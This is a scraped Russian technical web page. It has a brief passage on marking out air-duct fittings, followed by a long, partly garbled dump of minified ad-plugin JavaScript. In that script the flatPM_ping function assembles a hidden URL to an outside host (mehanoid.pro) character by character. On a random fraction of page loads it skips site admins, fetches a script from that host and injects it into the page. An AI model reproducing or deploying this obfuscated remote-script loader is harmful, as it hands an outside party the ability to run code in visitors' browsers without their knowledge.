Приведенные способы разметкифасонных частей воздуховодов применяются при их изготовлении в соответствии с Временной нормалью на металлические воздуховоды круглого сечения для систем аспирации.

Если же проектом предусмотрены воздуховоды из унифицированных деталей в соответствии с Инструкцией ВСН 353 — 75 / ММСС СССР, то разметка и изготовление деталей воздуховодов значительно упрощается.

 [14]

Механизм СТД-747.  [15]

Страницы:      1    2    3    4    5

Источник: https://www.ngpedia.ru/id592501p1.html

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};